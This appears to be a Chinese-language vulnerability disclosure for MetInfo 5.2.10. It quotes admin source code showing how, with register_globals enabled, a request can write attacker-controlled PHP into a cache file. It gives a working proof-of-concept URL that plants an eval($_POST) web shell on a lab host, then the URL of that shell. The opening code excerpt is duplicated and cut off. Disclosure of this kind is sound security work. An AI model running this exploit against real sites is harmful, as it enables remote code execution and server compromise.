<ul><li>/admin/include/common.inc.php</li></ul><pre class="">if(!is_array($met_langadmin[$_GET[langset]])&&$_GET[langset]!='')die('not have this language'); if($_GET[langset]!=''){ $_GET[langset]=daddslashes($_GET[langset],0,1); change_met_cookie('languser',$_GET[langset]); save_met_cookie(); } $_M['user']['cookie'] = $met_cookie; $metinfo_admin_name = get_met_cookie('metinfo_admin_name'); $metinfo_admin_pass = get_met_cookie('metinfo_admin_pass'); $metinfo_admin_pop = get_met_cookie('metinfo_admin_pop'); $metinfo_admin_shortcut = get_met_cookie('metinfo_admin_shortcut'); $languser = get_met_cookie('languser'); $langadminok = get_met_cookie('metinfo_admin_lang'); $langusenow=$languser; if($langadminok<>"" and $langadminok<>'metinfo')$adminlang=explode('-',$langadminok); require_once ROOTPATH_ADMIN.'include/lang.php'; </pre><p>包含lang.php</p><ul><li>/admin/include/lang.php</li></ul><pre class="">if(!file_get_contents(ROOTPATH.'cache/langadmin_'.$langset.'.php')){...
<ul><li>/admin/include/common.inc.php</li></ul><pre class="">if(!is_array($met_langadmin[$_GET[langset]])&&$_GET[langset]!='')die('not have this language'); if($_GET[langset]!=''){ $_GET[langset]=daddslashes($_GET[langset],0,1); change_met_cookie('languser',$_GET[langset]); save_met_cookie(); } $_M['user']['cookie'] = $met_cookie; $metinfo_admin_name = get_met_cookie('metinfo_admin_name'); $metinfo_admin_pass = get_met_cookie('metinfo_admin_pass'); $metinfo_admin_pop = get_met_cookie('metinfo_admin_pop'); $metinfo_admin_shortcut = get_met_cookie('metinfo_admin_shortcut'); $languser = get_met_cookie('languser'); $langadminok = get_met_cookie('metinfo_admin_lang'); $langusenow=$languser; if($langadminok<>"" and $langadminok<>'metinfo')$adminlang=explode('-',$langadminok); require_once ROOTPATH_ADMIN.'include/lang.php'; </pre><p>包含lang.php</p><ul><li>/admin/include/lang.php</li></ul><pre class="">if(!file_get_contents(ROOTPATH.'cache/langadmin_'.$langset.'.php')){ $js="var user_msg = new Array();\n"; $query="select * from $met_language where lang='$langset' and site='1' and array!='0'"; $result= $db->query($query); if($db->affected_rows()==0){ require_once ROOTPATH_ADMIN.'system/lang/lang.func.php'; $post=array('newlangmark'=>$langset,'metcms_v'=>$metcms_v,'newlangtype'=>'admin'); $file_basicname=ROOTPATH_ADMIN.'update/lang/lang_'.$langset.'.ini'; $re=syn_lang($post,$file_basicname,$langset,1,0); $query="select * from $met_language where lang='$langset' and site='1' and array!='0'"; $result= $db->query($query); } while($listlang= $db->fetch_array($result)){ if(substr($listlang['name'],0,2)=='js'){ $tmp=trim($listlang['value']); $js=$js."user_msg['{$listlang['name']}']='$tmp';\n"; } $name = 'lang_'.$listlang['name']; $$name= trim($listlang['value']); $str.='$'."{$name}='".str_replace(array('\\',"'"),array("\\\\","\\'"),trim($listlang['value']))."';"; } $js1='$'."js='".str_replace("'","\\'",$js).'\';'; $str="<?php\n".$str.$js1."\n?>"; file_put_contents(ROOTPATH.'cache/langadmin_'.$langset.'.php',$str); <br></pre><p>当文件不存在时,会写入一个php文件。<br></p><p>当PHP开启了register_globals时,可以控制变量符合条件,导致任意写入文件,以至于getshell。</p><p>访问地址:</p><pre class="">http://10.211.55.4/metinfo5.2.10//admin/include/common.inc.php?met_admin_type_ok=2&langset=aaaa&met_langadmin[aaaa][]=12345&str=eval($_POST[e]);%3F%3E//</pre><p>访问shell:</p><pre class="">http://10.211.55.4/MetInfo5.2.10/cache/langadmin_aaaa.php</pre><p> </p><p><img alt="D4474688-9C8E-4929-81C9-40CE2684EF83.png" src="https://images.seebug.org/@/uploads/1433921939736-D4474688-9C8E-4929-81C9-40CE2684EF83.png" data-image-size="1798,956"><br></p>
